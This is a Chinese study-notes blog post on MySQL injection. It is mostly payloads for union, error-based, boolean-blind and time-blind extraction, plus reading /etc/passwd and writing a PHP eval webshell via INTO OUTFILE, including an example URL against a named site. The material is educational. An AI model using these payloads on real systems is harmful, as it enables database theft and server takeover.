<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Pisces","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="联合查询注入原理union select可以查询两张不同表内的数据（取交集）。前提是前后列数相同，列也必须拥有相同的数据类型。 基本流程 判断注入点   猜字段数 order by  联合查询：  1&#39; union select database(),user() #  获取当前数据库和数据库用户名  1&#39; union select version(),@@version_comp">
<meta property="og:type" content="article">
<meta property="og:title" content="MYSQL注入">
<meta property="og:url" content="http://yoursite.com/2020/02/14/MYSQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="学习笔记">
<meta property="og:description" content="联合查询注入原理union select可以查询两张不同表内的数据（取交集）。前提是前后列数相同，列也必须拥有相同的数据类型。 基本流程 判断注入点   猜字段数 order by  联合查询：  1&#39; union select database(),user() #  获取当前数据库和数据库用户名  1&#39; union select version(),@@version_comp">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-02-14T01:00:45.000Z">
<meta property="article:modified_time" content="2020-03-26T14:13:08.670Z">
<meta property="article:author" content="nannanshen">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yoursite.com/2020/02/14/MYSQL%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>MYSQL注入 | 学习笔记</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">学习笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">ReadTeam</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/02/14/MYSQL%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="nannanshen">
      <meta itemprop="description" content="渗透测试">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="学习笔记">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          MYSQL注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-02-14 09:00:45" itemprop="dateCreated datePublished" datetime="2020-02-14T09:00:45+08:00">2020-02-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-03-26 22:13:08" itemprop="dateModified" datetime="2020-03-26T22:13:08+08:00">2020-03-26</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h1><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>union select可以查询两张不同表内的数据（取交集）。前提是前后列数相同，列也必须拥有相同的数据类型。</p>
<h2 id="基本流程"><a href="#基本流程" class="headerlink" title="基本流程"></a>基本流程</h2><ol>
<li><p>判断注入点 </p>
</li>
<li><p>猜字段数 order by</p>
</li>
<li><p>联合查询：</p>
<ul>
<li><p><code>1&#39; union select database(),user() #</code>  获取当前数据库和数据库用户名</p>
</li>
<li><p><code>1&#39; union select version(),@@version_compile_os#</code> 获取当前的数据库版本和操作系统</p>
<p>当MySQL的版本小于4.0时，是不支持union select联合查询的。当MySQL版本小于5.0时，有个默认数据库information_schema，保存了 Mysql服务器所有数据库的信息,如数据库名，数据库的表，表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表，该表包含两个字段 table_name 和table_schema，分别记录 DBMS 中的存储的表名和表名所在的数据库。</p>
</li>
<li><p><code>1&#39; union select table_name,table_schema from information_schema.tables where table_schema= &#39;dvwa&#39;#</code>  获取数据表名</p>
</li>
<li><p><code>1&#39; union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; #</code> 获取表中的列名</p>
</li>
</ul>
</li>
<li><p>获取数据</p>
<ul>
<li><code>1&#39; union select user,password from users#</code></li>
</ul>
</li>
</ol>
<h1 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h1><h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><ul>
<li><p>当在⼀个聚合函数，比如count函数后面如果使用分组语句就会把查询的⼀部分以错误的形式显⽰出来。当页面没有显位的时候，通过报错来获得显位，替换显位的语句来获取数据。</p>
</li>
<li><p>常用函数</p>
<ol>
<li>floor()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);</code></li>
</ul>
<ol start="2">
<li>extractvalue()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));</code></li>
</ul>
<ol start="3">
<li>updatexml()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));</code></li>
</ul>
<ol start="4">
<li>geometrycollection()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));</code></li>
</ul>
<ol start="5">
<li>multipoint()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));</code></li>
</ul>
<ol start="6">
<li>polygon()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and polygon((select * from(select * from(select user())a)b));</code></li>
</ul>
<ol start="7">
<li>multipolygon()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));</code></li>
</ul>
<ol start="8">
<li>linestring()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and linestring((select * from(select * from(select user())a)b));</code><br>​</li>
</ul>
<ol start="9">
<li>multilinestring()</li>
</ol>
<ul>
<li><code>select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));</code></li>
</ul>
<p>​10. exp()</p>
<ul>
<li><code>select * from test where id=1 and exp(~(select * from(select user())a));</code></li>
</ul>
</li>
<li><p>以上payload自行找资料理解原理</p>
</li>
</ul>
<h1 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h1><h2 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h2><ul>
<li>页面无显位只能返回正常和错误两种情况。</li>
<li>通过不停地测试返回结果判别语句执行结果。</li>
<li>常用函数<ol>
<li>length()返回长度</li>
<li>substr()截取字符串</li>
<li>ascii()返回字符ASCII码</li>
<li>sleep()将程序挂起一段时间</li>
</ol>
</li>
</ul>
<h2 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h2><ol>
<li>判断注入类型，数字or字符</li>
<li>猜数据库名：<ol>
<li>猜长度  <code>1&#39;  and length(database())=1 #</code></li>
<li>逐字猜解  <code>1&#39; and ascii(substr(database(),1,1))&gt;97 #</code></li>
</ol>
</li>
<li>猜表名：<ol>
<li>猜表的数量 <code>1&#39; and (select count (table_name) from information_schema.tables where table_schema=database())=1 #</code></li>
<li>猜第一个表的长度  <code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #</code></li>
<li>逐字猜解  <code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97 #</code></li>
</ol>
</li>
<li>猜字段名：<ol>
<li>猜字段数量  <code>1&#39; and (select count(column_name) from information_schema.columns where table_name= &#39;users&#39;)=1 #</code></li>
<li>猜第一个字段长度   <code>1&#39; and length(substr((select column_name from information_schema.columns where table_name= &#39;users&#39; limit 0,1),1))=1 #</code></li>
<li>逐字猜解  <code>1&#39; and ascii(substr((select column_name from information_schema.columns where table_name= &#39;users&#39; limit 0,1),1,1))&gt;97 #</code></li>
</ol>
</li>
<li>猜解数据<ol>
<li>二分法  <code>1&#39; and ascii(substr((select user from dvwa.users limit 0,1),1,1))&gt;96 #</code></li>
<li>暴力  <code>1&#39; and (select count(*) from users where user = &#39;admin&#39;) = 1 #</code></li>
</ol>
</li>
</ol>
<h1 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h1><h2 id="原理-3"><a href="#原理-3" class="headerlink" title="原理"></a>原理</h2><ul>
<li>不管语句执行正确或错误返回结果都一样。只能靠时间盲注。</li>
<li>if(condition,A,B) condition成立，则A，否则B。</li>
<li>mysql&gt;=5.0 使⽤sleep()进⾏查询   <code>id=1 and sleep(5)</code>，mysql&lt;5.0使用benchmark()进行查询  <code>select benchmark(1000,select * from admin);</code> 通过查询次数增多，时间变得缓慢来判断是否存在延迟。</li>
</ul>
<h2 id="流程-1"><a href="#流程-1" class="headerlink" title="流程"></a>流程</h2><ol>
<li>判断是否存在延迟注入  <code>id=1 and sleep(5)</code></li>
<li>判断当前用户  <code>and if(ascii(substr(user(),1,1))=114,sleep(5),1)</code></li>
<li>判断数据库名长度 <code>if(length(database())=8,sleep(5),1)</code></li>
<li>猜解数据库名称  <code>and if(ascii(substr(database(),1,1))&gt;100,sleep(5),1)</code></li>
<li>猜解表名  <code>and if(ascii(substr((SELECT distinct concat(table_name) FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1))=116,sleep(5),1);</code></li>
<li>猜解列名 <code>and if(ascii(substr((select column_name from information_schema.columns where table_name=&#39;admin&#39; limit,0,1),1,1))&gt;100,sleep(5),1)</code></li>
<li>猜数据  <code>and if(ascii(substr((select password from admin limit 0,1),1,1))&gt;100,sleep(5),1)</code></li>
</ol>
<h1 id="root权限处理"><a href="#root权限处理" class="headerlink" title="root权限处理"></a>root权限处理</h1><h2 id="条件"><a href="#条件" class="headerlink" title="条件"></a>条件</h2><ul>
<li>当前连接到的mysql用户具有root权限</li>
<li>能获取到网站的物理路径（phpinfo、报错、爆破…） </li>
<li>5.5.53之前的版本是secure_file_priv 变量默认为空，所以默认情况下是可以直接通过SQL语句来导出文件的。高于5.5时，mysql新出了一个secure-file-priv 字段 : secure-file-priv 参数是用来限制读写文件。查看secure-file-priv 参数的值:  <code>show global variables like &#39;%secure%&#39;</code></li>
</ul>
<h2 id="操作"><a href="#操作" class="headerlink" title="操作"></a>操作</h2><ol>
<li><p>读文件</p>
<ul>
<li><code>select load_file(&#39;/etc/passwd&#39;);</code></li>
<li><code>select load_file(0x2F6574632F706173737764);</code> 文件路径可换成16进制</li>
</ul>
</li>
<li><p>写文件</p>
<ul>
<li><p>INTO OUTFILE函数写文件时会在每一行的结束自动加上换行符</p>
</li>
<li><p>INTO DUMPFILE函数在写文件会保持文件得到原生内容，这种方式对于二进制文件是最好的选择</p>
</li>
<li><p><code>select &#39;&lt;?php @eval($_POST[pass])?&gt;&#39; into outfile &#39;/var/www/html/muma.php&#39; ;</code>  注意，有时候斜杠要转义，用双斜杠代替</p>
</li>
<li><p><code>select &#39;&lt;?php @eval($_POST[pass])?&gt;&#39; into DUMPFILE &#39;/var/www/html/muma.php&#39; ;</code></p>
</li>
<li><p><code>select * from tdb_goods where goods_id=1 into outfile &quot;/var/www/html/muma.php&quot; LINES STARTING BY &#39;&lt;?php @eval($_POST[pass])?&gt;&#39;</code></p>
</li>
<li><p>LINES STARTING BY ‘写⼊的内容’：设置每行数据开头的字符，可以为单个或多个字符。默认情况下不使⽤任何字符。</p>
</li>
<li><p>LINES TERMINATED BY ‘写⼊的内容’：设置每行数据结尾的字符，可以为单个或多个字符。默认值是”\n”。</p>
</li>
</ul>
</li>
</ol>
<h2 id="案例"><a href="#案例" class="headerlink" title="案例"></a>案例</h2><p><code>http://www.dark5.net/index.php?id=1 and 1=2 union select 1,2,3,4,&#39;&lt;?php eval($_POST[1])?&gt;&#39;,5 into outfile &#39;/var/www/html/1.php&#39; --</code></p>
<h2 id="GPC的问题"><a href="#GPC的问题" class="headerlink" title="GPC的问题"></a>GPC的问题</h2><p>PHP开启GPC以后，会把接收的字符加上反斜杠转义。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/02/13/%E6%89%AB%E6%8F%8F%E5%99%A8%E7%9A%84%E4%BD%BF%E7%94%A8%E5%92%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%80%9D%E7%BB%B4/" rel="prev" title="扫描器的使用和漏洞利用思维">
      <i class="fa fa-chevron-left"></i> 扫描器的使用和漏洞利用思维
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/02/15/MSSQL%E6%B3%A8%E5%85%A5/" rel="next" title="MSSQL注入">
      MSSQL注入 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#联合查询注入"><span class="nav-number">1.</span> <span class="nav-text">联合查询注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理"><span class="nav-number">1.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基本流程"><span class="nav-number">1.2.</span> <span class="nav-text">基本流程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#报错注入"><span class="nav-number">2.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理-1"><span class="nav-number">2.1.</span> <span class="nav-text">原理</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#布尔盲注"><span class="nav-number">3.</span> <span class="nav-text">布尔盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理-2"><span class="nav-number">3.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#流程"><span class="nav-number">3.2.</span> <span class="nav-text">流程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#延时盲注"><span class="nav-number">4.</span> <span class="nav-text">延时盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理-3"><span class="nav-number">4.1.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#流程-1"><span class="nav-number">4.2.</span> <span class="nav-text">流程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#root权限处理"><span class="nav-number">5.</span> <span class="nav-text">root权限处理</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#条件"><span class="nav-number">5.1.</span> <span class="nav-text">条件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#操作"><span class="nav-number">5.2.</span> <span class="nav-text">操作</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#案例"><span class="nav-number">5.3.</span> <span class="nav-text">案例</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GPC的问题"><span class="nav-number">5.4.</span> <span class="nav-text">GPC的问题</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="nannanshen"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">nannanshen</p>
  <div class="site-description" itemprop="description">渗透测试</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/nannanshen" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;nannanshen" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.dark5.net/" title="https:&#x2F;&#x2F;www.dark5.net&#x2F;" rel="noopener" target="_blank">dark5</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">nannanshen</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v4.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.7.1
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
<!-- 页面点击小红心 ,和看板娘冲突了。-->
<!--<script type="text/javascript" src="/js/src/clicklove.js"></script>-->
<!-- 看板娘 -->
<!-- <script src="/live2d-widget/autoload.js"></script> -->